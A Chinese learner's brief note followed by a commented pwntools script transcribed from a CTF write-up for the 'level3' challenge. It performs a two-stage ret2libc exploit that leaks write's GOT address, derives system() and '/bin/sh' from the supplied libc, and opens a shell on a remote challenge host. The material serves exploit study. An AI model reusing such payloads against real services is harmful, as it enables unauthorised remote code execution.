完全是照着 WriteUp 写的，里面提到了 PLT 和 GOT 表，这个概念之前接触过一点，但没怎么用过。模仿人家代码的时候也没怎么细想。先敲一遍，将来理解会更深刻。
"""Two-stage ret2libc walkthrough for the "level3" challenge, transcribed from the write-up.

Stage 1 returns into write@plt so the program prints its own GOT entry for
write(), i.e. the address the dynamic loader resolved at runtime.  Stage 2
subtracts the symbol offset taken from the supplied libc_32.so.6 to obtain
the libc load base, then derives system() and a "/bin/sh" string from it.

All addresses come from the challenge ELF and the supplied libc, so the
script is tied to exactly those two files.  The fixed elf.plt/elf.got/elf.sym
values presuppose a non-PIE build, and reaching the saved return address
with plain filler presupposes no stack canary -- presumably what the original
write-up checked; either hardening would defeat this layout.
"""
from pwn import *

# Challenge service used in the write-up; the ELF and libc are the local
# copies that shipped with it.
p = remote("111.198.29.45",33161)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")

# PLT stub (callable before any leak), GOT slot (holds the resolved libc
# address once write has been used) and main (lets the program be
# re-entered for a second payload).
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']

# Wait for the input prompt.
p.recvuntil(":\n")
# 0x88 bytes of filler plus one more 4-byte word (presumably the saved ebp)
# reach the saved return address; the offset is taken from the write-up, not
# derived here.  Then: return into write@plt, "return" to main afterwards,
# and the three write(fd, buf, count) arguments -- stdout, the GOT slot,
# 4 bytes.
payload=b'0'*0x88+p32(0)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)

# Assumes the reply is exactly the 4 leaked bytes: u32() expects a 4-byte
# input and p.recv() is called without a length here.
write_got_addr=u32(p.recv())
print(hex(write_got_addr))

# Leaked runtime address minus the symbol's offset in libc_32.so.6 gives
# the load base; everything else is base + offset.
libc_base=write_got_addr-libc.sym['write']
print(hex(libc_base))
system_addr=libc_base+libc.sym['system']
print(hex(system_addr))
# Hard-coded offset of a "/bin/sh" string in libc_32.so.6 per the write-up;
# TODO confirm against the libc file.
binshaddr=libc_base+0x15902B
print(hex(binshaddr))

# Second pass through main: same padding, then system(), a dummy return
# address (p32(0)) and the "/bin/sh" pointer as its argument.
payload2=b'0'*0x88+p32(0)+p32(system_addr)+p32(0)+p32(binshaddr)
p.recvuntil(":\n")
p.sendline(payload2)
# Hand the connection over to the user.
p.interactive()